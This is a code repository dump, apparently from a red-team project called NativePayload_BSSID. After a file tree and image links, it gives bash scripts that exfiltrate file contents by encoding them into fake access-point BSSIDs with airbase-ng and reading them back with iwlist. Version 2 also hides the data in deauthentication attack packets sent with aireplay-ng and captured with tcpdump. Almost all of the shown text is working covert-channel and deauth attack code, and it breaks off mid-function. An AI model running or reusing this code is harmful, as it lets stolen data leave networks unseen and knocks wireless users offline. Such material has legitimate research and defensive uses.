├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID ├── NativePayload_BSSID.sh ├── NativePayload_BSSID1.png ├── NativePayload_BSSID2.png ├── NativePayload_BSSIDv2 │ ├── NativePayload_BSSID Step1.png │ ├── NativePayload_BSSID Step2.png │ ├── NativePayload_BSSID Step3.png │ ├── NativePayload_BSSID Step4.png │ ├── NativePayload_BSSID help.png │ ├── NativePayload_BSSID.sh │ └── README.md └── README.md ├── EBOOK ├── Client_Exfiltration_via_FakeAP.sh ├── Client_killAP.sh ├── GetData.png ├── README.md ├── Server_GetData_via_BSSID.sh └── Server_iwlist_Scan.sh ├── NativePayload_BSSID v2 ├── NativePayload_BSSID.sh └── README.md ├── NativePayload_BSSID.cs ├── README.md ├── Video-[v2] ├── README.md ├── Video.NativePayload_BSSIDv2.zip.part-aa ├── Video.NativePayload_BSSIDv2.zip.part-ab ├── Video.NativePayload_BSSIDv2.zip.part-ac ├── Video.NativePayload_BSSIDv2.zip.part-ad └── Video.NativePayload_BSSIDv2.zip.part-ae └── managedwifi.dll /1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/1.png -------------------------------------------------------------------------------- /2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/2.png -------------------------------------------------------------------------------- /3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/3.png -------------------------------------------------------------------------------- /4.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/4.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSID.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo 3 | echo "NativePayload_BSSID.sh , Published by Damon Mohammadbagher 2017-2018" 4 | echo "Injecting/Downloading/Uploading DATA via BSSID (Wireless Traffic)" 5 | echo "help syntax: ./NativePayload_BSSID.sh help" 6 | echo 7 | function killairbase 8 | { 9 | 10 | sleep 10 ; 11 | echo 12 | killall airbase-ng ; 13 | 14 | } 15 | if [ $1 == "help" ] 16 | then 17 | tput setaf 2; 18 | echo 19 | echo "Example Step1: (Client Side ) ./NativePayload_BSSID.sh -f text-file Fake-AP-Name MonitorMode-Interface" 20 | echo "Example Step2: (Server Side ) ./NativePayload_BSSID.sh -s wlanx Exfil-Dump-file" 21 | echo "example System A : ./NativePayload_BSSID.sh -f mytext.txt myfakeAP Wlan3mon" 22 | echo "example System B : ./NativePayload_BSSID.sh -s wlan0 ExfilDumped.txt" 23 | echo "Description: with Step1 (system A) you will inject bytes for (mytext.txt) file to BSSID for Fake AP in this case (myfakeAP) , with Step2 on (system B) you can have this text file via Scanning Fake AP on AIR by Wireless traffic (Using iwlist tool)" 24 | echo "Note : before step1 you should make MonitorMode Interface (WlanXmon) by this command for example : airmon-ng start wlan3 " 25 | echo 26 | 27 | fi 28 | 29 | # ./NativePayload_BSSID.sh -f mytext.txt Fake wlan1mon0 30 | # making fake mode 31 | if [ $1 == "-f" ] 32 | then 33 | for bytes in `xxd -p -c 5 $2 | sed 's/../&:/g'`; 34 | do 35 | tput setaf 6; 36 | Exfil="${bytes::-1}" 37 | text=`echo $Exfil | xxd -r -p` 38 | Time=`date '+%d/%m/%Y %H:%M:%S'` 39 | echo "[!] 
[$Time] #Injecting text: "\"$text\" "to Mac via BSSID" 00:$Exfil "for FAKE AccessPoint: " $3 40 | sleep 0.3 41 | tput setaf 9; 42 | # Making Fake AP via airbase and Injecting Payloads to BSSIDs (MAC Address) 43 | killairbase | airbase-ng -a 00:$Exfil --essid $3 -I 10 -0 $4 | grep started 44 | 45 | done 46 | Time=`date '+%d/%m/%Y %H:%M:%S'` 47 | tput setaf 6; 48 | echo "[>] [$Time] Setting Finish Flag to BSSID..." 49 | sleep 0.3 50 | tput setaf 9; 51 | killairbase | airbase-ng -a 00:ff:00:ff:00:ff --essid $3 -I 10 -0 $4 | grep started 52 | fi 53 | 54 | # ./NativePayload_BSSID.sh -s wlan0 myExfildump.txt 55 | # starting scan mode 56 | if [ $1 == "-s" ] 57 | then 58 | echo "Scanning Mode by \"Iwlist\" tool Started." 59 | echo "" > $3 60 | while true 61 | do 62 | # echo `iwlist 'wlan0' 'scan' | grep -e "Address: 00:"` >> $2 ; 63 | echo `iwlist $2 'scan' | grep -e "Address: 00:"` >> $3 ; 64 | tput setaf 9; 65 | Time=`date '+%d/%m/%Y %H:%M:%S'` 66 | echo "[!] [$Time] iwlist AP list Dumped to file: " $3; 67 | sleep 6 ; 68 | FinishFlag=`cat $3 | grep -e 00:ff:00:ff:00:ff -e 00:FF:00:FF:00:FF` 69 | if (( `echo ${#FinishFlag}` !=0 )) 70 | then 71 | Time=`date '+%d/%m/%Y %H:%M:%S'` 72 | sleep 0.3 73 | tput setaf 7; 74 | echo "[!] [$Time] Finish flag BSSID Address Detected :" 00:ff:00:ff:00:ff 75 | break 76 | fi 77 | done 78 | tput setaf 9; 79 | # fold -w37 $3 > output.txt ; 80 | Time=`date '+%d/%m/%Y %H:%M:%S'` 81 | echo "[>] [$Time] AP List saved to" \"temp.txt\" "file" 82 | echo 83 | 84 | # DEBUG 85 | # cat output.txt 86 | fold -w37 $3 > temp.txt; 87 | awk {'print $5'} temp.txt > temp2Awk.txt; 88 | # using '!a[$0]++' is not good idea ;) sometimes.... . 89 | for ops in `awk '!a[$0]++' temp2Awk.txt | xxd -p`; 90 | do 91 | ops1=`echo $ops | xxd -r -p` 92 | ops2=`echo $ops | xxd -r -p | xxd -r -p` 93 | echo $ops1 "==>" $ops2 94 | done 95 | echo 96 | echo "[!] your Injected Bytes via BSSID Addresses: " 97 | echo 98 | echo `awk '!a[$0]++' temp2Awk.txt` 99 | echo 100 | echo "[!] 
your Text/Data: " 101 | echo 102 | ExfilString=`cat temp2Awk.txt | awk '!a[$0]++'` 103 | echo "${ExfilString::-17}" | xxd -r -p 104 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 105 | echo " " > ExfilOutput_$Timestr.txt 106 | echo 107 | echo "[>] your Text/Data saved to" \"ExfilOutput_$Timestr.txt\" "file" 108 | str=`echo "${ExfilString::-17}" | xxd -r -p` 109 | echo $str > ExfilOutput_$Timestr.txt 110 | fi 111 | -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSID1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSID1.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSID2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSID2.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step1.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless 
Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step2.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step3.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID Step4.png -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID help.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID help.png 
-------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/NativePayload_BSSID.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo 3 | echo "NativePayload_BSSID.sh v2 , Published by Damon Mohammadbagher 2017-2019" 4 | echo "Injecting/Downloading/Uploading DATA via BSSID (Wireless Traffic)" 5 | echo "help syntax: ./NativePayload_BSSID.sh help" 6 | echo 7 | 8 | function _help () 9 | { 10 | tput setaf 2 11 | echo 12 | echo "[@]:NativePayload_BSSID.sh $(tput setaf 11)v2$(tput setaf 2) , Published by $(tput setaf 3)Damon Mohammadbagher 2017-2019$(tput setaf 2)" 13 | echo "[@]:NativePayload_BSSID.sh (Internal.Commands):" 14 | echo 15 | tput setaf 10 16 | echo "[@]:Client/Server Side (Internal.Commands):" 17 | echo 18 | tput setaf 2 19 | printf '\u2507'; echo "$(tput setaf 11) @help $(tput setaf 2) => show all internal Commands" 20 | printf '\u2523\u2509'; echo "Description: Help for commands" 21 | printf '\u2516\u2509'; echo "Example:#@help" 22 | echo 23 | printf '\u2507'; echo "$(tput setaf 11) @exit $(tput setaf 2) => exit" 24 | printf '\u2523\u2509'; echo "Description: exit to Console" 25 | printf '\u2516\u2509'; echo "Example:#@exit" 26 | echo 27 | printf '\u2507'; echo "$(tput setaf 11) @clientmode $(tput setaf 2) or $(tput setaf 11) @cli $(tput setaf 2) => switch to client mode" 28 | printf '\u2523\u2509'; echo "Description: switch to client mode" 29 | printf '\u2523\u2509'; echo "Example:#@clientmode" 30 | printf '\u2516\u2509'; echo "Example:#@cli" 31 | echo 32 | printf '\u2507'; echo "$(tput setaf 11) @servermode $(tput setaf 2) or $(tput setaf 11) @serv $(tput setaf 2) => switch to server mode" 33 | printf '\u2523\u2509'; echo "Description: switch to server mode" 34 | printf '\u2523\u2509'; echo "Example:#@servermode" 35 | printf '\u2516\u2509'; echo "Example:#@serv" 36 | echo 37 | printf 
'\u2507'; echo "$(tput setaf 11) @clear $(tput setaf 2) => Console clear" 38 | printf '\u2523\u2509'; echo "Description: Console clear" 39 | printf '\u2516\u2509'; echo "Example:#@clear" 40 | echo 41 | printf '\u2507'; echo "$(tput setaf 11) @dbgon $(tput setaf 2) => show details : enable" 42 | printf '\u2523\u2509'; echo "Description: show all details" 43 | printf '\u2516\u2509'; echo "Example:#@dbgon" 44 | echo 45 | printf '\u2507'; echo "$(tput setaf 11) @dbgoff $(tput setaf 2) => show details : disable" 46 | printf '\u2523\u2509'; echo "Description: Disabling details (default)" 47 | printf '\u2516\u2509'; echo "Example:#@dbgoff" 48 | echo 49 | tput setaf 10 50 | echo "[@]:Server Side (only) (Internal.Commands):" 51 | echo 52 | tput setaf 2 53 | printf '\u2507'; echo "$(tput setaf 11) @bssid $(tput setaf 2) or $(tput setaf 11) bssid $(tput setaf 2) => Scanning BSSID via Iwlist (server-side) $(tput setaf 3)(Old v1 / slow)$(tput setaf 2)" 54 | printf '\u2523\u2509'; echo "Description: Scanning BSSID on AIR via Iwlist tool to dump Exfil/Text/Data from (client-side) (default)" 55 | printf '\u2523\u2509'; echo "Example:#@bssid" 56 | printf '\u2516\u2509'; echo "Example:#bssid" 57 | echo 58 | printf '\u2507'; echo "$(tput setaf 11) @deauth $(tput setaf 2) or $(tput setaf 11) deauth $(tput setaf 2) => Attack.(Deauth) Packet Monitoring for Fake AP (server-side) $(tput setaf 3)(New v2 / very fast)$(tput setaf 2)" 59 | printf '\u2523\u2509'; echo "Description: Monitoring WlanMon interface (Monitor-Interface) to Detect Recevied Payload via Deauth Attack Packets from Clients" 60 | printf '\u2523\u2509'; echo "Example:#@deauth" 61 | printf '\u2516\u2509'; echo "Example:#deauth" 62 | echo 63 | printf '\u2507'; echo "$(tput setaf 11) @run $(tput setaf 2) => running server side Methods [BSSID or DeAuth]" 64 | printf '\u2523\u2509'; echo "Description: running server side Methods [BSSID or DeAuth]" 65 | printf '\u2516\u2509'; echo "Example:#@run" 66 | 67 | } 68 | function 
killairbase 69 | { 70 | 71 | sleep 10 ; 72 | echo 73 | killall airbase-ng ; 74 | 75 | } 76 | 77 | ################################################## version 1 ################################################## 78 | ################################################## send_Bssids v1 ################################################# 79 | # ./NativePayload_BSSID.sh -f mytext.txt Fake wlan1mon0 80 | # making fake mode (send_Bssids) 81 | if [ $1 == "-f" ] 82 | then 83 | for bytes in `xxd -p -c 5 $2 | sed 's/../&:/g'`; 84 | do 85 | tput setaf 6; 86 | Exfil="${bytes::-1}" 87 | text=`echo $Exfil | xxd -r -p` 88 | Time=`date '+%d/%m/%Y %H:%M:%S'` 89 | echo "[!]:[$Time] Injecting text: "\"$text\" "to Mac via BSSID" "[00:$Exfil]" "for FAKE AccessPoint: " $3 90 | sleep 0.3 91 | tput setaf 9; 92 | # Making Fake AP via airbase and Injecting Payloads to BSSIDs (MAC Address) 93 | killairbase | airbase-ng -a 00:$Exfil --essid $3 -I 10 -0 $4 | grep started 94 | 95 | done 96 | Time=`date '+%d/%m/%Y %H:%M:%S'` 97 | tput setaf 6; 98 | echo "[>]:[$Time] Setting Finish Flag [00:ff:00:ff:00:ff] to BSSID..." 99 | sleep 0.3 100 | tput setaf 9; 101 | killairbase | airbase-ng -a 00:ff:00:ff:00:ff --essid $3 -I 10 -0 $4 | grep started 102 | fi 103 | ################################################## send_Bssids v1 ##################################### 104 | ################################################## receive_Bssids v1 ##################################### 105 | # ./NativePayload_BSSID.sh -s wlan0 myExfildump.txt 106 | # starting scan mode (dump_Bssids) 107 | if [ $1 == "-s" ] 108 | then 109 | echo "Scanning Mode by \"Iwlist\" tool Started." 
110 | echo "" > $3 111 | while true 112 | do 113 | # echo `iwlist 'wlan0' 'scan' | grep -e "Address: 00:"` >> $2 ; 114 | echo `iwlist $2 'scan' | grep -e "Address: 00:"` >> $3 ; 115 | tput setaf 9; 116 | Time=`date '+%d/%m/%Y %H:%M:%S'` 117 | echo "[!]:[$Time] iwlist AP list Dumped to file: " $3; 118 | sleep 4.2 ; 119 | FinishFlag=`cat $3 | grep -e 00:ff:00:ff:00:ff -e 00:FF:00:FF:00:FF` 120 | if (( `echo ${#FinishFlag}` !=0 )) 121 | then 122 | Time=`date '+%d/%m/%Y %H:%M:%S'` 123 | sleep 0.3 124 | tput setaf 7; 125 | echo "[!]:[$Time] Finish flag BSSID Address Detected :" 00:ff:00:ff:00:ff 126 | break 127 | fi 128 | done 129 | tput setaf 9; 130 | # fold -w37 $3 > output.txt ; 131 | Time=`date '+%d/%m/%Y %H:%M:%S'` 132 | echo "[>] [$Time] AP List saved to" \"temp.txt\" "file" 133 | echo 134 | 135 | # DEBUG 136 | # cat output.txt 137 | fold -w37 $3 > temp.txt; 138 | awk {'print $5'} temp.txt > temp2Awk.txt; 139 | # using '!a[$0]++' is not good idea ;) sometimes.... . 140 | for ops in `awk '!a[$0]++' temp2Awk.txt | xxd -p`; 141 | do 142 | ops1=`echo $ops | xxd -r -p` 143 | ops2=`echo $ops | xxd -r -p | xxd -r -p` 144 | echo $ops1 "==>" $ops2 145 | done 146 | echo 147 | echo "[!] your Injected Bytes via BSSID Addresses: " 148 | echo 149 | echo `awk '!a[$0]++' temp2Awk.txt` 150 | echo 151 | echo "[!] 
your Text/Data: " 152 | echo 153 | ExfilString=`cat temp2Awk.txt | awk '!a[$0]++'` 154 | echo "${ExfilString::-17}" | xxd -r -p 155 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 156 | echo " " > ExfilOutput_$Timestr.txt 157 | echo 158 | echo "[>] your Text/Data saved to" \"ExfilOutput_$Timestr.txt\" "file" 159 | str=`echo "${ExfilString::-17}" | xxd -r -p` 160 | echo $str > ExfilOutput_$Timestr.txt 161 | fi 162 | ################################################## receive_Bssids v1 ##################################### 163 | ################################################## version 1 ################################################## 164 | 165 | ################################################################################################################### 166 | ################################################################################################################### 167 | ################################################################################################################### 168 | 169 | ################################################## version 2 ################################################## 170 | ################################################## send_Bssids v2 ############################### 171 | function sendBssids 172 | { 173 | tput setaf 6; 174 | Time=`date '+%d/%m/%Y %H:%M:%S'` 175 | echo "[>]:[$Time] Exfiltration.via.BSSID:Started" 176 | 177 | for bytes in `echo "$1" | xxd -p -c 5 | sed 's/../&:/g'`; 178 | do 179 | 180 | Exfil="${bytes::-1}" 181 | text=`echo $Exfil | xxd -r -p` 182 | Time=`date '+%d/%m/%Y %H:%M:%S'` 183 | if [ "$4" == "true" ] 184 | then 185 | tput setaf 10; 186 | echo "[!]:[$Time] Injecting text: "\"$text\" "to Mac via BSSID" "[00:$Exfil]" "for FAKE AccessPoint: " $2 187 | else 188 | tput setaf 6; 189 | printf "." 
190 | fi 191 | sleep 10 192 | tput setaf 9; 193 | tempaddress=`echo "00:$Exfil:20:20:20:20:20:20" | head -c17` 194 | killairbase | nohup airbase-ng -a $tempaddress --essid $2 -I 10 -0 $3 > "airbase_output.txt" 2>&1 & 195 | done 196 | 197 | if [ "$4" == "false" ] 198 | then 199 | echo " " 200 | fi 201 | tput setaf 10; 202 | Time=`date '+%d/%m/%Y %H:%M:%S'` 203 | echo "[>]:[$Time] Setting Finish Flag [00:ff:00:ff:00:ff] to BSSID..." 204 | sleep 10 205 | 206 | killairbase | nohup airbase-ng -a 00:ff:00:ff:00:ff --essid $2 -I 10 -0 $3 > "airbase_output.txt" 2>&1 & 207 | Time=`date '+%d/%m/%Y %H:%M:%S'` 208 | tput setaf 6; 209 | echo "[>]:[$Time] Exfiltration.via.BSSID:Done" 210 | tput setaf 2; 211 | } 212 | ################################################## send_Bssids v2 ############################### 213 | 214 | ################################################## receive_Bssids v2 ############################ 215 | function receiveBssids 216 | { 217 | # ./NativePayload_BSSID.sh -s wlan0 myExfildump.txt 218 | # receiveBssids "wlan0" "myExfildump.txt" "false" 219 | #echo "Scanning Mode by \"Iwlist\" tool Started." 220 | Time=`date '+%d/%m/%Y %H:%M:%S'` 221 | tput setaf 6; 222 | echo "[>]:[$Time]:Iwlist.AP.Scanning.via.[$1]:Started" 223 | echo "" > $2 224 | while true 225 | do 226 | # echo `iwlist 'wlan0' 'scan' | grep -e "Address: 00:"` >> $2 ; 227 | echo `iwlist $1 'scan' | grep -e "Address: 00:"` >> $2 ; 228 | if [ "$3" == "true" ] 229 | then 230 | tput setaf 10; 231 | Time=`date '+%d/%m/%Y %H:%M:%S'` 232 | echo "[!]:[$Time]:Iwlist.APlist.Saving.[$2]:Done"; 233 | else 234 | printf "." 
235 | fi 236 | 237 | sleep 4.2 ; 238 | 239 | FinishFlag=`strings "$2" | grep -e 00:ff:00:ff:00:ff -e 00:FF:00:FF:00:FF` 240 | if (( `echo ${#FinishFlag}` !=0 )) 241 | then 242 | if [ "$3" == "false" ] 243 | then 244 | echo 245 | fi 246 | sleep 0.3 247 | tput setaf 6; 248 | Time=`date '+%d/%m/%Y %H:%M:%S'` 249 | echo "[!]:[$Time]:Finish.flag.BSSID.[00:ff:00:ff:00:ff]:Detected" 250 | break 251 | fi 252 | done 253 | 254 | tput setaf 6; 255 | Time=`date '+%d/%m/%Y %H:%M:%S'` 256 | echo "[>]:[$Time]:Iwlist.APlist.Saving.[temp.txt]:Done"; 257 | 258 | # DEBUG 259 | # cat output.txt 260 | tput setaf 10; 261 | fold -w37 $2 > temp.txt; 262 | awk {'print $5'} temp.txt | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00://g' > temp2Awk.txt; 263 | 264 | tput setaf 2; 265 | Time=`date '+%d/%m/%Y %H:%M:%S'` 266 | printf "[!]:[$Time]:Injected.Bytes.[BSSID]:" 267 | echo `awk '!a[$0]++' temp2Awk.txt` 268 | ExfilString=`strings temp2Awk.txt | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g'| awk '!a[$0]++' | xxd -r -p` 269 | tput setaf 10; 270 | echo "[!]:[$Time]:Dumped.[Text/Data]:$(tput setaf 11) $ExfilString" 271 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 272 | echo " " > "ExfilOutput_$Timestr.txt" 273 | str=`echo "$ExfilString" | xxd -r -p` 274 | echo $str > ExfilOutput_$Timestr.txt 275 | Time=`date '+%d/%m/%Y %H:%M:%S'` 276 | tput setaf 10; 277 | echo "[>]:[$Time]:Text.saved.[ExfilOutput_$Timestr.txt]:Done" 278 | tput setaf 2; 279 | } 280 | ################################################## receive_Bssids v2 ############################ 281 | 282 | ########################################### ExfilDeauth v2 (send) ############################### 283 | # ExfilDeauth "up.txt" "00:11:22:33:44:55" "wlan0" "1" 284 | # ExfilDeauth "local text file" "target AP/Fake AP BSSID" "local Wlan" "local wlan channel" 285 | function ExfilDeauth 286 | { 287 | Time=`date '+%d/%m/%Y %H:%M:%S'` 288 | tput setaf 6; 289 | echo "[>]:[$Time]:Exfiltration via Deauthentication 
Packets:Started" 290 | tput setaf 2; 291 | echo "[>]:[$Time]:Sending Deauthentication Packets via $3 by channel $4 to Default Target AP:Started" 292 | echo "[>]:[$Time]:Sending Deauthentication Packets to Target AP.BSSID.[00:11:22:33:44:55]:Started" 293 | 294 | `iwconfig $3 channel $4` 295 | Random1=`head /dev/urandom | tr -dc 0-2 | head -c1` 296 | id="0" 297 | 298 | for bytes in `echo "$1" | xxd -p -c 5 | sed 's/../&:/g'`; 299 | do 300 | tput setaf 2; 301 | Exfil="${bytes::-1}" 302 | text=`echo "$Exfil:20:20:20:20:20:20" | head -c17 | xxd -r -p` 303 | Time=`date '+%d/%m/%Y %H:%M:%S'` 304 | 305 | if [ "$id" == "0" ] ; 306 | then 307 | Random1="0" 308 | id="1" 309 | elif [ "$id" == "1" ] ; 310 | then 311 | Random1="1" 312 | id="2" 313 | elif [ "$id" == "2" ] ; 314 | then 315 | Random1="2" 316 | id="3" 317 | elif [ "$id" == "3" ] ; 318 | then 319 | Random1="3" 320 | id="4" 321 | elif [ "$id" == "4" ] ; 322 | then 323 | Random1="4" 324 | id="5" 325 | elif [ "$id" == "5" ] ; 326 | then 327 | Random1="5" 328 | id="6" 329 | elif [ "$id" == "6" ] ; 330 | then 331 | Random1="6" 332 | id="7" 333 | elif [ "$id" == "7" ] ; 334 | then 335 | Random1="7" 336 | id="8" 337 | elif [ "$id" == "8" ] ; 338 | then 339 | Random1="8" 340 | id="9" 341 | elif [ "$id" == "9" ] ; 342 | then 343 | Random1="9" 344 | id="a" 345 | elif [ "$id" == "a" ] ; 346 | then 347 | Random1="a" 348 | id="b" 349 | elif [ "$id" == "b" ] ; 350 | then 351 | Random1="b" 352 | id="c" 353 | elif [ "$id" == "c" ] ; 354 | then 355 | Random1="c" 356 | id="d" 357 | elif [ "$id" == "d" ] ; 358 | then 359 | Random1="d" 360 | id="e" 361 | elif [ "$id" == "e" ] ; 362 | then 363 | Random1="e" 364 | id="f" 365 | elif [ "$id" == "f" ] ; 366 | then 367 | Random1="f" 368 | id="0" 369 | fi 370 | 371 | tempaddress=`echo "0$Random1:$Exfil:20:20:20:20:20:20" | head -c17` 372 | sleep 0.2 373 | 374 | if [ "$5" == "true" ] 375 | then 376 | tput setaf 10; 377 | Time=`date '+%d/%m/%Y %H:%M:%S'` 378 | echo "[!]:[$Time]:Injecting text: 
"\"$text\" "to Deauthentication Packet via" "[$tempaddress]" "for FAKE AccessPoint: " $2 379 | aireplay-ng -0 1 -a "$2" -c "$tempaddress" "$3" | grep "Sending" & 380 | else 381 | printf "." 382 | tput setaf 10; 383 | aireplay-ng -0 1 -a "$2" -c "$tempaddress" "$3" | grep "error ;)" & 384 | fi 385 | 386 | done 387 | 388 | if [ "$5" == "false" ] 389 | then 390 | echo " " 391 | fi 392 | sleep 0.1 393 | Time=`date '+%d/%m/%Y %H:%M:%S'` 394 | echo "[>]:[$Time]:Sending Finish Flag [00:ff:00:ff:00:ff] to target AccessPoint: $2" 395 | aireplay-ng -0 3 -a "$2" -c "00:ff:00:ff:00:ff" "$3" | grep "error ;)" & 396 | wait; 397 | Time=`date '+%d/%m/%Y %H:%M:%S'` 398 | tput setaf 6; 399 | echo "[!]:[$Time]:Exfiltration via Deauthentication Packets:Done" 400 | 401 | } 402 | ########################################### ExfilDeauth v2 (send) ############################### 403 | 404 | 405 | ########################################### ExfilDeauth v2 (receive) ############################ 406 | # ExfilDeauthDumps -dumpdeauth wlan1mon "1" 407 | # ExfilDeauthDumps "essid-fakev2" wlan1mon channel true 408 | function ExfilDeauthDumps 409 | { 410 | 411 | tput setaf 2; 412 | FakeAp="$1" 413 | 414 | if [ "$1" == "" ] 415 | then 416 | FakeAp="fakev2"; 417 | fi 418 | 419 | Time=`date '+%d/%m/%Y %H:%M:%S'` 420 | echo "[>]:[$Time]:Default AP.BSSID.[00:11:22:33:44:55]:Created" 421 | nohup airbase-ng -a 00:11:22:33:44:55 --essid "$FakeAp" -I 10 -0 "$2" -c "$3" > "airbase_output.txt" 2>&1 & 422 | Time=`date '+%d/%m/%Y %H:%M:%S'` 423 | tput setaf 10; 424 | echo "[>]:[$Time]:Default AP.ESSID.[$FakeAp] with Wifi Channel.[$3] via $2:Started" 425 | tput setaf 2; 426 | sleep 1.5 427 | `nohup tcpdump -i "$2" -n | grep "DeAuthentication" > "DeauthPayloadDumps.txt" 2>&1 &` 428 | sleep 1 429 | Time=`date '+%d/%m/%Y %H:%M:%S'` 430 | echo "[>]:[$Time]:$2 Packet Monitoring for DeAuthentication Traffic:Started" 431 | while true 432 | do 433 | if [ "$4" == "true" ] 434 | then 435 | printf '.' 
436 | fi 437 | FinishFlag=`strings "DeauthPayloadDumps.txt" | grep "00:ff:00:ff:00:ff"` 438 | if (( `echo ${#FinishFlag}` !=0 )) 439 | then 440 | tput setaf 6; 441 | Time=`date '+%d/%m/%Y %H:%M:%S'` 442 | if [ "$4" == "true" ] 443 | then 444 | echo "" 445 | fi 446 | echo "[!]:[$Time]:Finish Flag:Detected" 447 | break; 448 | fi 449 | sleep 3.5 450 | done 451 | `strings "DeauthPayloadDumps.txt" | awk {'print $12'} | awk '!a[$0]++' | sed "s/00:11:22:33:44:55//g" | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00:11:22:33:44:55//g' | sed 's/00://g' | sed 's/01://g' | sed 's/02://g' | sed 's/03://g' | sed 's/04://g' | sed 's/05://g' | sed 's/06://g' | sed 's/07://g' | sed 's/08://g' | sed 's/09://g' | sed 's/0a://g' | sed 's/0b://g' | sed 's/0c://g' | sed 's/0d://g' | sed 's/0e://g' | sed 's/0f://g' | xxd -r -p > "DeAuthbytes.txt" ` 452 | payload=`cat DeAuthbytes.txt` 453 | Time=`date '+%d/%m/%Y %H:%M:%S'` 454 | tput setaf 6; 455 | echo "[!]:[$Time]:Payload Dumping:Done" 456 | tput setaf 10; 457 | echo "[!]:[$Time]:Text/Data Dumped:$(tput setaf 11) $payload" 458 | nohup killall airbase-ng > "kill.txt" 2>&1 & 459 | nohup killall tcpdump > "kill.txt" 2>&1 & 460 | tput setaf 10; 461 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 462 | echo " " > "ExfilOutput_$Timestr.txt" 463 | echo $payload > "ExfilOutput_$Timestr.txt" 464 | echo "[>]:[$Time]:Text/Data saved to \"ExfilOutput_$Timestr.txt\"" 465 | tput setaf 2; 466 | } 467 | ########################################### ExfilDeauth v2 (receive) ############################ 468 | 469 | ############################### ExfilDeauth v2 (Command-based send) ############################### 470 | # ./NativePayload_BSSID.sh -exfildeauth text.txt "bssid" wlan1 "7" 471 | # ./NativePayload_BSSID.sh -exfildeauth text.txt "00:11:22:33:44:55" wlan1 "7" "dbg" 472 | if [ $1 == "-exfildeauth" ]; 473 | then 474 | `iwconfig $4 channel $5` 475 | Random1=`head /dev/urandom | tr -dc 0-2 | head -c1` 476 | id="0" 477 | 478 | for bytes 
